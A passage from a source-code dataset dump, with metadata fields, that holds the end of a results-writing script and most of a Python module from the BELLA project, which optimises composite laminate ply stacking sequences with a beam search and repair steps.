percentage']\\\r\n# = 100 * abs((B12K - B12_target)/B12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B12 percentage'] = 0\r\n# if B66_target:\r\n# table_result.loc[0 + 1, 'diff B66 percentage']\\\r\n# = 100 * abs((B66K - B66_target)/B66_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B66 percentage'] = 0\r\n# if B16_target:\r\n# table_result.loc[0 + 1, 'diff B16 percentage']\\\r\n# = 100 * abs((B16K - B16_target)/B16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B16 percentage'] = 0\r\n# if B26_target:\r\n# table_result.loc[0 + 1, 'diff B26 percentage']\\\r\n# = 100 * abs((B26K - B26_target)/B26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff B26 percentage'] = 0\r\n#\r\n# if D11_target:\r\n# table_result.loc[0 + 1, 'diff D11 percentage']\\\r\n# = 100 * abs((D11K - D11_target)/D11_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D11 percentage'] = 0\r\n# if D22_target:\r\n# table_result.loc[0 + 1, 'diff D22 percentage']\\\r\n# = 100 * abs((D22K - D22_target)/D22_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D22 percentage'] = 0\r\n# if D12_target:\r\n# table_result.loc[0 + 1, 'diff D12 percentage']\\\r\n# = 100 * abs((D12K - D12_target)/D12_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D12 percentage'] = 0\r\n# if D66_target:\r\n# table_result.loc[0 + 1, 'diff D66 percentage']\\\r\n# = 100 * abs((D66K - D66_target)/D66_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D66 percentage'] = 0\r\n# if D16_target:\r\n# table_result.loc[0 + 1, 'diff D16 percentage']\\\r\n# = 100 * abs((D16K - D16_target)/D16_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D16 percentage'] = 0\r\n# if D26_target:\r\n# table_result.loc[0 + 1, 'diff D26 percentage']\\\r\n# = 100 * abs((D26K - D26_target)/D26_target)\r\n# else:\r\n# table_result.loc[0 + 1, 'diff D26 percentage'] = 0\r\n#\r\n#\r\n#\r\n#\r\n# if A11_target:\r\n# table_result.loc[0 + 2, 'diff A11 percentage']\\\r\n# = 100 * abs((A11 - A11_target)/A11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A11 percentage'] = 0\r\n# if A22_target:\r\n# table_result.loc[0 + 2, 'diff A22 percentage']\\\r\n# = 100 * abs((A22 - A22_target)/A22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A22 percentage'] = 0\r\n# if A12_target:\r\n# table_result.loc[0 + 2, 'diff A12 percentage']\\\r\n# = 100 * abs((A12 - A12_target)/A12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A12 percentage'] = 0\r\n# if A66_target:\r\n# table_result.loc[0 + 2, 'diff A66 percentage']\\\r\n# = 100 * abs((A66 - A66_target)/A66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A66 percentage'] = 0\r\n# if A16_target:\r\n# table_result.loc[0 + 2, 'diff A16 percentage']\\\r\n# = 100 * abs((A16 - A16_target)/A16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A16 percentage'] = 0\r\n# if A26_target:\r\n# table_result.loc[0 + 2, 'diff A26 percentage']\\\r\n# = 100 * abs((A26 - A26_target)/A26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff A26 percentage'] = 0\r\n#\r\n# if B11_target:\r\n# table_result.loc[0 + 2, 'diff B11 percentage']\\\r\n# = 100 * abs((B11 - B11_target)/B11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B11 percentage'] = 0\r\n# if B22_target:\r\n# table_result.loc[0 + 2, 'diff B22 percentage']\\\r\n# = 100 * abs((B22 - B22_target)/B22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B22 percentage'] = 0\r\n# if B12_target:\r\n# table_result.loc[0 + 2, 'diff B12 percentage']\\\r\n# = 100 * abs((B12 - B12_target)/B12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B12 percentage'] = 0\r\n# if B66_target:\r\n# table_result.loc[0 + 2, 'diff B66 percentage']\\\r\n# = 100 * abs((B66 - B66_target)/B66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B66 percentage'] = 0\r\n# if B16_target:\r\n# table_result.loc[0 + 2, 'diff B16 percentage']\\\r\n# = 100 * abs((B16 - B16_target)/B16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B16 percentage'] = 0\r\n# if B26_target:\r\n# table_result.loc[0 + 2, 'diff B26 percentage']\\\r\n# = 100 * abs((B26 - B26_target)/B26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff B26 percentage'] = 0\r\n#\r\n# if D11_target:\r\n# table_result.loc[0 + 2, 'diff D11 percentage']\\\r\n# = 100 * abs((D11 - D11_target)/D11_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D11 percentage'] = 0\r\n# if D22_target:\r\n# table_result.loc[0 + 2, 'diff D22 percentage']\\\r\n# = 100 * abs((D22 - D22_target)/D22_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D22 percentage'] = 0\r\n# if D12_target:\r\n# table_result.loc[0 + 2, 'diff D12 percentage']\\\r\n# = 100 * abs((D12 - D12_target)/D12_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D12 percentage'] = 0\r\n# if D66_target:\r\n# table_result.loc[0 + 2, 'diff D66 percentage']\\\r\n# = 100 * abs((D66 - D66_target)/D66_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D66 percentage'] = 0\r\n# if D16_target:\r\n# table_result.loc[0 + 2, 'diff D16 percentage']\\\r\n# = 100 * abs((D16 - D16_target)/D16_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D16 percentage'] = 0\r\n# if D26_target:\r\n# table_result.loc[0 + 2, 'diff D26 percentage']\\\r\n# = 100 * abs((D26 - D26_target)/D26_target)\r\n# else:\r\n# table_result.loc[0 + 2, 'diff D26 percentage'] = 0\r\n\r\n# print(table_result)\r\n\r\n append_df_to_excel(\r\n result_filename, table_result, 'results', index=True, header=True)\r\n\r\n\r\n### Write results in a excell sheet\r\nsave_constraints_LAYLA(result_filename, constraints)\r\nsave_parameters_LAYLA_V02(result_filename, parameters)\r\nsave_materials(result_filename, mat_prop)\r\nautofit_column_widths(result_filename)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5166283249855042,
"alphanum_fraction": 0.5244004130363464,
"avg_line_length": 42.74477767944336,
"blob_id": "2e6454e6e86ae958e6a4dba24bf4387547ee27fb",
"content_id": "e8fd0325f5bfc47fe183eccb1c851c136eeb73ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29979,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 670,
"path": "/src/BELLA/optimiser_with_one_pdl.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nOptimisation of a composite laminate design based on an input py drop layout\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nfrom src.BELLA.results import BELLA_ResultsOnePdl\r\nfrom src.BELLA.objectives import calc_obj_each_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.moments_of_areas import calc_mom_of_areas2\r\nfrom src.BELLA.lampam_matrix import calc_delta_lampams2\r\nfrom src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_ply_counts\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.pruning import pruning_diso_contig_damtol\r\nfrom src.RELAY.repair_mp import repair_mp\r\n#from src.guidelines.one_stack import check_ply_drop_rules\r\nfrom src.BELLA.format_pdl import extend_after_guide_based_blending\r\n#from src.divers.pretty_print import print_list_ss\r\n\r\ndef BELLA_optimiser_one_pdl(\r\n multipanel, parameters, obj_func_param, constraints, ply_order,\r\n mom_areas_plus, delta_lampams, pdl, mat=0):\r\n \"Ply angle optimisation with beam search (BELLA step 3)\"\r\n\r\n results = BELLA_ResultsOnePdl()\r\n# print_list_ss(pdl)\r\n\r\n # to normalise the disorientation and contiguity constraints' penalties\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.reduced.panels])\r\n\r\n # ply indices in the order in which plies are optimised\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n\r\n lampam_matrix = calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise)\r\n\r\n (cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas) \\\r\n = calc_mom_of_areas2(\r\n multipanel, constraints, mom_areas_plus, pdl, n_plies_to_optimise)\r\n\r\n # lampam_weightings: lamination parameter weightings at each level of the\r\n # search (used in the objective function calculation)\r\n lampam_weightings = np.zeros(\r\n (n_plies_to_optimise, multipanel.reduced.n_panels, 12))\r\n for ind_ply in range(n_plies_to_optimise):\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n lampam_weightings[ind_ply, ind_panel, 0:4] \\\r\n = panel.lampam_weightings[0:4] \\\r\n * cummul_areas[ind_panel, ind_ply]\r\n\r\n lampam_weightings[ind_ply, ind_panel, 4:8] \\\r\n = panel.lampam_weightings[4:8] \\\r\n * cummul_first_mom_areas[ind_panel, ind_ply]\r\n\r\n lampam_weightings[ind_ply, ind_panel, 8:12] \\\r\n = panel.lampam_weightings[8:12] \\\r\n * cummul_sec_mom_areas[ind_panel, ind_ply]\r\n\r\n if not np.isclose(lampam_weightings[ind_ply, ind_panel],\r\n np.zeros((12,), float)).all():\r\n lampam_weightings[ind_ply, ind_panel] \\\r\n /= np.sum(lampam_weightings[ind_ply, ind_panel])\r\n\r\n # Stacking sequences of the active nodes\r\n ss_bot_tab = [[np.array([], dtype=int) \\\r\n for ii in range(multipanel.reduced.n_panels)]]\r\n if not constraints.sym:\r\n ss_top_tab = [[np.array([], dtype=int) \\\r\n for ii in range(multipanel.reduced.n_panels)]]\r\n\r\n # Lamination parameters of the active nodes\r\n lampam_tab = np.zeros((1, multipanel.reduced.n_panels, 12), float)\r\n\r\n # Estimate function values of the active nodes\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n obj_no_constraints_tab = np.zeros((1, multipanel.reduced.n_panels,), float)\r\n\r\n # Ply counts in each fibre orientation of the active nodes\r\n n_plies_per_angle_tab = np.zeros((\r\n 1, multipanel.reduced.n_panels, constraints.n_set_of_angles),\r\n dtype='float16')\r\n\r\n n_obj_func_calls = 0 # Number of objective function calls\r\n\r\n ss_final = []\r\n sst_final = []\r\n pdl_final = []\r\n penalty_diso_final = []\r\n penalty_contig_final = []\r\n penalty_bal_ipo_final = []\r\n penalty_10_final = []\r\n\r\n for level in indices:\r\n# =============================================================================\r\n# preparation of the exploration of a level during beam search #\r\n# =============================================================================\r\n last_level = level == indices[-1]\r\n # print('level in the search tree', level)\r\n\r\n n_nodes = obj_constraints_tab.size\r\n\r\n for node in range(n_nodes):\r\n# =============================================================================\r\n# selection of first active node to be branched #\r\n# =============================================================================\r\n mother_ss_bot = ss_bot_tab.pop(0)\r\n if not constraints.sym:\r\n mother_ss_top = ss_top_tab.pop(0)\r\n\r\n mother_lampam = lampam_tab[0]\r\n\r\n mother_n_plies_per_angle = n_plies_per_angle_tab[0]\r\n\r\n lampam_tab = np.delete(lampam_tab, np.s_[0], axis=0)\r\n\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[0], axis=0)\r\n\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[0], axis=0)\r\n\r\n# print('at the beginning')\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print()\r\n# print('mother_ss_top', mother_ss_top)\r\n\r\n# =============================================================================\r\n# branching #\r\n# =============================================================================\r\n child_ss = np.copy(constraints.set_of_angles)\r\n\r\n# =============================================================================\r\n# pruning for damage tolerance, disorientation and contiguity in guide panel\r\n# =============================================================================\r\n if constraints.sym:\r\n ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_bot=mother_ss_bot[multipanel.reduced.ind_thick],\r\n level=level,\r\n constraints=constraints,\r\n has_middle_ply=multipanel.has_middle_ply,\r\n n_plies_to_optimise=n_plies_to_optimise)\r\n else:\r\n ss = pruning_diso_contig_damtol(\r\n child_ss=child_ss,\r\n mother_ss_top=mother_ss_top[multipanel.reduced.ind_thick],\r\n mother_ss_bot=mother_ss_bot[multipanel.reduced.ind_thick],\r\n level=level,\r\n constraints=constraints,\r\n n_plies_to_optimise=n_plies_to_optimise)\r\n if ss is None: # branch totally pruned\r\n continue # go to next step\r\n# print('ss after pruning for design guidelines', ss.T)\r\n\r\n# =============================================================================\r\n# calculation of ply counts #\r\n# =============================================================================\r\n n_plies_per_angle = np.zeros((\r\n ss.size, multipanel.reduced.n_panels,\r\n constraints.n_set_of_angles), dtype=float)\r\n for ind_angle in range(ss.size):\r\n n_plies_per_angle[ind_angle] = np.copy(\r\n mother_n_plies_per_angle)\r\n\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n index = constraints.ind_angles_dict[ss[ind_angle]]\r\n if last_level and multipanel.has_middle_ply:\r\n n_plies_per_angle[\r\n ind_angle, ind_panel, index] += 1/2\r\n else:\r\n n_plies_per_angle[\r\n ind_angle, ind_panel, index] += 1\r\n\r\n n_plies_per_angle_tab = np.vstack((\r\n n_plies_per_angle_tab, n_plies_per_angle))\r\n# print('n_plies_per_angle', n_plies_per_angle)\r\n\r\n# =============================================================================\r\n# calculation of lamination parameters #\r\n# =============================================================================\r\n for ind_angle in range(ss.size):\r\n lampam = np.copy(mother_lampam)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n lampam[ind_panel] += lampam_matrix[\r\n ind_panel,\r\n constraints.ind_angles_dict[ss[ind_angle]], level]\r\n lampam_tab = np.vstack(\r\n (lampam_tab,\r\n lampam.reshape(1, multipanel.reduced.n_panels, 12)))\r\n\r\n n_obj_func_calls += 1\r\n\r\n# =============================================================================\r\n# computation of stacking sequences #\r\n# =============================================================================\r\n if constraints.sym:\r\n for ind_angle in range(ss.size):\r\n ss_bot = list(mother_ss_bot)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_bot[ind_panel] = np.hstack((\r\n ss_bot[ind_panel], ss[ind_angle]))\r\n ss_bot_tab.append(ss_bot)\r\n\r\n else:\r\n for ind_angle in range(ss.size):\r\n\r\n ss_top = list(mother_ss_top)\r\n ss_bot = list(mother_ss_bot)\r\n\r\n if level % 2 == 0:\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_bot[ind_panel] = np.hstack((\r\n ss_bot[ind_panel], ss[ind_angle]))\r\n else:\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n if pdl[ind_panel, level] >= 0:\r\n ss_top[ind_panel] = np.hstack((\r\n ss[ind_angle], ss_top[ind_panel]))\r\n\r\n ss_top_tab.append(ss_top)\r\n ss_bot_tab.append(ss_bot)\r\n\r\n# print('ss_bot_tab', ss_bot_tab)\r\n# print()\r\n\r\n# =============================================================================\r\n# computation of penalties and objective function values\r\n# =============================================================================\r\n for ind_angle, ind_angle2 \\\r\n in zip(range(-ss.size, 0, 1), range(ss.size)):\r\n\r\n # calulation of the objective/estimate function values\r\n obj_no_constraints = calc_obj_each_panel(\r\n multipanel=multipanel,\r\n lampam=lampam_tab[ind_angle],\r\n mat=mat,\r\n obj_func_param=obj_func_param,\r\n lampam_weightings=lampam_weightings[level])\r\n obj_no_constraints_tab = np.vstack((\r\n obj_no_constraints_tab, obj_no_constraints))\r\n\r\n\r\n # calulation of the penalties for balance\r\n penalty_bal_ipo = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the 10% rule\r\n penalty_10 = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the disorientation rule\r\n penalty_diso = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the penalties for the contiguity rule\r\n penalty_contig = np.zeros((\r\n multipanel.reduced.n_panels,), float)\r\n\r\n # calulation of the estimate/objective functions\r\n obj_constraints = calc_obj_multi_panel(\r\n objective=obj_no_constraints,\r\n actual_panel_weightings=\\\r\n multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=penalty_diso,\r\n penalty_contig=penalty_contig,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n coeff_diso=obj_func_param.coeff_diso,\r\n coeff_contig=obj_func_param.coeff_contig,\r\n coeff_10=obj_func_param.coeff_10,\r\n coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, obj_constraints))\r\n\r\n# print('mother_ss_top', mother_ss_top)\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print('obj_no_constraints', obj_no_constraints)\r\n# print('obj_constraints_tab', obj_constraints_tab)\r\n\r\n# =============================================================================\r\n# local pruning\r\n# =============================================================================\r\n n_local_nodes = ss.size\r\n if last_level:\r\n node_limit = parameters.local_node_limit_final\r\n else:\r\n node_limit = parameters.local_node_limit\r\n n_excess_nodes = n_local_nodes - node_limit\r\n if level != n_plies_to_optimise - 1 and n_excess_nodes > 0:\r\n obj_constraints_tab_to_del = np.copy(\r\n obj_constraints_tab)[-n_local_nodes:]\r\n to_del = []\r\n for counter in range(n_excess_nodes):\r\n ind_max = np.argmax(obj_constraints_tab_to_del)\r\n obj_constraints_tab_to_del[ind_max] = -6666\r\n to_del.append(\r\n ind_max + obj_constraints_tab.size - n_local_nodes)\r\n for ind_del in sorted(to_del, reverse=True):\r\n del ss_bot_tab[ind_del]\r\n if not constraints.sym:\r\n del ss_top_tab[ind_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[to_del], axis=0)\r\n obj_constraints_tab = np.delete(\r\n obj_constraints_tab, np.s_[to_del])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[to_del], axis=0)\r\n\r\n# print('mother_ss_top', mother_ss_top)\r\n# print('mother_ss_bot', mother_ss_bot)\r\n# print('len(ss_top_tab)', len(ss_top_tab))\r\n# print('ss after local pruning', ss.T)\r\n# print('obj_constraints_tab', obj_constraints_tab[-ss.size:])\r\n# print('lampam_tab.shape', lampam_tab.shape)\r\n# =============================================================================\r\n# global pruning\r\n# =============================================================================\r\n if obj_constraints_tab.size == 0:\r\n raise Exception(\"\"\"\r\nbeam search with no solutions !\r\n -Constraints too strict or optimiser parameters not allowing for\r\n sufficient design space exploration\"\"\")\r\n if last_level:\r\n node_limit = parameters.global_node_limit_final\r\n else:\r\n node_limit = parameters.global_node_limit\r\n if obj_constraints_tab.size > node_limit:\r\n obj_constraints_tab_to_del = np.copy(obj_constraints_tab)\r\n for counter in range(node_limit):\r\n ind_min = np.argmin(obj_constraints_tab_to_del)\r\n obj_constraints_tab_to_del[ind_min] = 6666\r\n to_keep = obj_constraints_tab_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in enumerate(to_del) if x]\r\n for ind_del in sorted(to_del, reverse=True):\r\n del ss_bot_tab[ind_del]\r\n if not constraints.sym:\r\n del ss_top_tab[ind_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n n_plies_per_angle_tab = np.delete(\r\n n_plies_per_angle_tab, np.s_[to_del], axis=0)\r\n obj_constraints_tab = np.delete(\r\n obj_constraints_tab, np.s_[to_del])\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[to_del], axis=0)\r\n# print('size after global pruning', obj_constraints_tab.size)\r\n\r\n\r\n# =============================================================================\r\n# repair with RELAY\r\n# =============================================================================\r\n for ind_angle in range(obj_constraints_tab.size):\r\n\r\n # generate full stacking\r\n stack = []\r\n if constraints.sym:\r\n for ind_panel, panel \\\r\n in enumerate(multipanel.reduced.panels):\r\n stack.append(np.array((), dtype=int))\r\n stack[ind_panel] = np.hstack((\r\n ss_bot_tab[ind_angle][ind_panel],\r\n np.flip(ss_bot_tab[ind_angle][ind_panel],\r\n axis=0)\r\n )).astype('int16')\r\n\r\n if panel.has_middle_ply:\r\n stack[ind_panel] = np.delete(\r\n stack[ind_panel],\r\n np.s_[panel.middle_ply_index],\r\n axis=0)\r\n\r\n if stack[ind_panel].size != panel.n_plies:\r\n raise Exception(\"Wrong ply count\")\r\n else:\r\n for ind_panel, panel \\\r\n in enumerate(multipanel.reduced.panels):\r\n stack.append(np.array((), dtype=int))\r\n stack[ind_panel] = np.hstack((\r\n ss_bot_tab[ind_angle][ind_panel],\r\n ss_top_tab[ind_angle][ind_panel]\r\n )).astype('int16')\r\n if stack[ind_panel].size != panel.n_plies:\r\n raise Exception(\"Wrong ply count\")\r\n # print('stack', stack)\r\n\r\n # laminate repair with RELAY\r\n results_repair = repair_mp(\r\n multipanel, stack, constraints, parameters,\r\n obj_func_param, reduced_pdl=pdl, mat=mat)\r\n results.n_designs_last_level += 1\r\n # successful repair\r\n if results_repair[0]:\r\n results.n_designs_after_ss_ref_repair += 1\r\n results.n_designs_after_thick_to_thin += 1\r\n results.n_designs_after_thin_to_thick += 1\r\n # repair reference panel unsuccessful\r\n elif results_repair[4] == 1:\r\n pass\r\n # repair thick-to-thin unsuccessful\r\n elif results_repair[4] == 2:\r\n results.n_designs_after_ss_ref_repair += 1\r\n # repair thin-to-thick unsuccessful\r\n else:\r\n results.n_designs_after_ss_ref_repair += 1\r\n results.n_designs_after_thick_to_thin += 1\r\n\r\n # possible changes during repair\r\n lampam_tab[ind_angle] = calc_lampam(\r\n results_repair[1], constraints)\r\n ss_final.append(results_repair[1])\r\n sst_final.append(results_repair[2])\r\n pdl_final.append(results_repair[3])\r\n ply_counts = calc_ply_counts(\r\n multipanel, results_repair[1], constraints)\r\n n_plies_per_angle_tab[ind_angle] = ply_counts\r\n\r\n # penalty for disorientation\r\n n_diso = calc_number_violations_diso_mp(results_repair[1], constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n # penalty for contiguity\r\n n_contig = calc_penalty_contig_mp(results_repair[1], constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n # penalty for 10% rule\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(results_repair[1],\r\n constraints,\r\n LPs=lampam_tab[ind_angle], mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(ply_counts, constraints)\r\n\r\n # penalty for balance\r\n penalty_bal_ipo = np.zeros((multipanel.reduced.n_panels,), float)\r\n\r\n penalty_diso_final.append(penalty_diso)\r\n penalty_contig_final.append(penalty_contig)\r\n penalty_bal_ipo_final.append(penalty_bal_ipo)\r\n penalty_10_final.append(penalty_10)\r\n\r\n # calulation of the objective/estimate function values\r\n if not results_repair[0]:\r\n obj_no_constraints = 1e10 * np.ones((\r\n multipanel.reduced.n_panels,), float)\r\n else:\r\n obj_no_constraints = calc_obj_each_panel(\r\n multipanel=multipanel,\r\n lampam=lampam_tab[ind_angle],\r\n mat=mat,\r\n obj_func_param=obj_func_param,\r\n lampam_weightings=lampam_weightings[level])\r\n obj_no_constraints_tab[ind_angle] = obj_no_constraints\r\n\r\n if not (obj_no_constraints != 1e10).all():\r\n obj_constraints = 1e10\r\n else:\r\n obj_constraints = calc_obj_multi_panel(\r\n objective=obj_no_constraints,\r\n actual_panel_weightings=\\\r\n multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=penalty_diso,\r\n penalty_contig=penalty_contig,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n coeff_diso=obj_func_param.coeff_diso,\r\n coeff_contig=obj_func_param.coeff_contig,\r\n coeff_10=obj_func_param.coeff_10,\r\n coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n obj_constraints_tab[ind_angle] = obj_constraints\r\n\r\n# =============================================================================\r\n# select best result\r\n# =============================================================================\r\n ss_bot_tab = np.copy(ss_final)\r\n\r\n if parameters.save_success_rate:\r\n to_keep = np.array([ind for ind in range(len(obj_constraints_tab))\\\r\n if obj_constraints_tab[ind] < 1e10])\r\n to_del = np.array([ind for ind in range(len(obj_constraints_tab))\\\r\n if ind not in to_keep])\r\n if to_keep.size:\r\n ss_final = [ss_final[ind] for ind in to_keep]\r\n sst_final = [sst_final[ind] for ind in to_keep]\r\n pdl_final = [pdl_final[ind] for ind in to_keep]\r\n penalty_diso_final = [penalty_diso_final[ind] for ind in to_keep]\r\n penalty_contig_final = [\r\n penalty_contig_final[ind] for ind in to_keep]\r\n penalty_bal_ipo_final = [\r\n penalty_bal_ipo_final[ind] for ind in to_keep]\r\n penalty_10_final = [penalty_10_final[ind] for ind in to_keep]\r\n\r\n for ind in to_del[::-1]:\r\n lampam_tab = np.delete(lampam_tab, np.s_[ind], axis=0)\r\n obj_constraints_tab = np.delete(\r\n obj_constraints_tab, np.s_[ind], axis=0)\r\n obj_no_constraints_tab = np.delete(\r\n obj_no_constraints_tab, np.s_[ind], axis=0)\r\n\r\n results.n_designs_repaired_unique = np.unique(\r\n sst_final, axis=0).shape[0]\r\n\r\n if len(obj_constraints_tab) == 0:\r\n print('No laminate design solution with this initial ply drop layout')\r\n return None\r\n\r\n index = np.argmin(obj_constraints_tab)\r\n ss = ss_bot_tab[index]\r\n lampam = lampam_tab[index]\r\n n_plies_per_angle = n_plies_per_angle_tab[index]\r\n obj_no_constraints = obj_no_constraints_tab[index]\r\n obj_constraints = obj_constraints_tab[index]\r\n# =============================================================================\r\n# Check the results\r\n# =============================================================================\r\n # test for the ply counts\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n if ss[ind_panel].size != panel.n_plies:\r\n raise Exception(\"\"\"\r\nWrong ply counts in the laminate.\"\"\")\r\n\r\n # test for the partial lamination parameters\r\n ss = list(ss)\r\n lampam_test = calc_lampam(ss, constraints)\r\n if not abs(lampam - lampam_test).all() < 1e-13:\r\n print_lampam(lampam[0], lampam_test[0])\r\n print_ss(ss[0])\r\n raise Exception(\"\"\"\r\nLamination parameters not matching the stacking sequences.\"\"\")\r\n\r\n # test for the objective function value\r\n obj_no_constraints_test = calc_obj_each_panel(\r\n multipanel=multipanel,\r\n lampam=lampam,\r\n lampam_weightings=lampam_weightings[level],\r\n mat=mat,\r\n obj_func_param=obj_func_param)\r\n\r\n if abs(obj_no_constraints_test - obj_no_constraints > 1e-10).any():\r\n print('obj_no_constraints_test', obj_no_constraints_test)\r\n print('obj_no_constraints', obj_no_constraints)\r\n raise Exception(\"\"\"\r\nObjective function value not matching the stacking sequences.\"\"\")\r\n\r\n\r\n # disorientaion - penalty used in blending steps 4.2 and 4.3\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n # contiguity - penalty used in blending steps 4.2 and 4.3\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n # 10% rule - no penalty used in blending steps 4.2 and 4.3\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(n_plies_per_angle, constraints)\r\n\r\n # balance\r\n penalty_bal_ipo = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n# print()\r\n# print_ss(ss[2])\r\n# print('obj_no_constraints', obj_no_constraints)\r\n# print(penalty_diso)\r\n# print(penalty_contig)\r\n# print(penalty_bal_ipo)\r\n# print(penalty_10)\r\n\r\n obj_constraints_test = calc_obj_multi_panel(\r\n objective=obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=penalty_diso,\r\n penalty_contig=penalty_contig,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n coeff_diso=obj_func_param.coeff_diso,\r\n coeff_contig=obj_func_param.coeff_contig,\r\n coeff_10=obj_func_param.coeff_10,\r\n coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n\r\n if abs(obj_constraints_test - 